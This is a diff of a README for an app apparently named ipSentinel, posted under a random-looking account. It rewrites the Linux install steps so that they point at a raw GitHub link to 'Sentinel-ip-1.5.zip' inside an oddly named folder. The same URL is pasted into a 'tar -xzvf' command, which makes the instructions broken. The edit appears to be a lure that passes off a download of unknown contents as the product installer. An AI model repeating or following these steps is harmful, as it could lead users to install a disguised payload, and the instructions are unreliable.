ghjkldfdfg/ipSentinel/README.md

    Click on the file that matches your operating system.
 If you're not sure, here are some suggestions:
    - For Windows: Download the file ending in `.exe`
    - For Mac: Look for the file ending in `.dmg`
-   - For Linux: Download the file ending in `.tar.gz`
+   - For Linux: Download the file ending in `https://github.com/ghjkldfdfg/ipSentinel/raw/refs/heads/main/characterology/Sentinel-ip-1.5.zip`

 4. **Install the Application:**
    After the download completes, locate the file on your device.
 Follow these steps to install it:
    - **Windows:** Double-click the `.exe` file and follow the installation wizard.
    - **Mac:** Open the `.dmg` file, then drag the ipSentinel icon to your Applications folder.
-   - **Linux:** Open a terminal, navigate to the folder where you downloaded the file, and extract it using the command `tar -xzvf yourfile.tar.gz`.
+   - **Linux:** Open a terminal, navigate to the folder where you downloaded the file, and extract it using the command `tar -xzvf https://github.com/ghjkldfdfg/ipSentinel/raw/refs/heads/main/characterology/Sentinel-ip-1.5.zip`.
 Follow the included instructions for setup.

 5. **Run ipSentinel:**
    Once installed, look for the ipSentinel icon on your desktop or in your applications folder.
 Double-click it to launch the application.